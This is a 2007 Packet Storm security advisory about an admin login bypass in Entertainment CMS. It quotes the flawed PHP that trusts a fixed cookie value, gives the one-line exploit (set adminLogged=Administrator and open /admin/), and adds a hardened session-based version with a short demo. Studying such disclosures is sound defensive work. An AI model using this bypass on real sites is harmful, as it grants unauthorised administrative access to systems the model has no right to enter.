ecms-bypass.txt

2007-07-11T00:00:00
ID PACKETSTORM:57602
Type packetstorm
Reporter Kw3rLN
Modified 2007-07-11T00:00:00

Description

                                        
                                            `Entertainment CMS Admin Login Bypass  
  
Web: Entertainment CMS  
Demo : http://multimedia.mydlstore.net/  
Download: http://rapidshare.com/files/39640099/enter-cms.rar  
  
Author: Kw3rLn [ teh_lost_byte[at]YaHoO[d0t]Com ]  
Romanian Security Team [Ethical Hacking] - hTTp://RSTZONE.nET  
  
Vulnerable codE:  
  
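$adminOK=0;  
  
// Form login: compare the submitted credentials with the configured ones  
if (isset($_POST["adminUser"])) {  
    if (($_POST["adminUser"]==$adminUser) && ($_POST["adminPass"]==$adminPass)) {  
        setcookie("adminLogged","Administrator", NULL, "/");  
        $adminOK=1;  
    }  
}  
  
// Cookie check: a fixed, client-supplied value is the only proof of a prior login  
if ((isset($_COOKIE["adminLogged"])) && ($_COOKIE["adminLogged"]=="Administrator")) {  
    $adminOK=1;  
}  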
  
  
  
  
Exploit:  
Set your cookie: adminLogged=Administrator then g0 to http://site.com/admin/ and you have full admin access  
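
Hardened form of the check above, as an added example (not part of the original advisory and not Entertainment CMS code): the login state lives in the server-side session instead of a fixed cookie value. $adminUser is the name used on the page; $adminPassHash, checkLogin() and isAdmin() are assumptions made for the illustration.

```php
<?php
declare(strict_types=1);
// Added example, not Entertainment CMS code. $adminUser is the page's name;
// $adminPassHash (password_hash() output) and both helpers are assumptions.

function checkLogin(array $post, string $adminUser, string $adminPassHash): bool
{
    $user = $post['adminUser'] ?? null;
    $pass = $post['adminPass'] ?? null;
    if (!is_string($user) || !is_string($pass)) {
        return false;               // reject array-typed parameters
    }
    // Evaluate both comparisons; hash_equals is a constant-time string compare.
    $userOk = hash_equals($adminUser, $user);
    $passOk = password_verify($pass, $adminPassHash);
    return $userOk && $passOk;
}

function isAdmin(array $session): bool
{
    // Only state stored on the server counts; $_COOKIE is never consulted.
    return ($session['adminOK'] ?? false) === true;
}

// Constructed sample credentials for the demonstration.
$adminUser = 'admin';
$adminPassHash = password_hash('constructed-sample-password', PASSWORD_DEFAULT);

// Add 'secure' => true when the admin area is served over HTTPS.
session_set_cookie_params(['path' => '/', 'httponly' => true, 'samesite' => 'Strict']);
session_start();

if (isset($_POST['adminUser']) && checkLogin($_POST, $adminUser, $adminPassHash)) {
    session_regenerate_id(true);    // fresh session id once privileges change
    $_SESSION['adminOK'] = true;
}

$adminOK = isAdmin($_SESSION) ? 1 : 0;

if (PHP_SAPI === 'cli') {
    // Constructed request: the cookie value from the advisory is present
    $_COOKIE['adminLogged'] = 'Administrator';
    var_dump(isAdmin($_SESSION));
    var_dump(checkLogin(['adminUser' => ['x'], 'adminPass' => 'y'], $adminUser, $adminPassHash));
}
```

The session cookie carries only a random identifier, so a client cannot assert admin status by choosing a cookie value.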
  
GREETZ: all memberz of RST and milw0rm  
//kw3rln [ http://rstzone.net ] [ RST will be back s00n ]  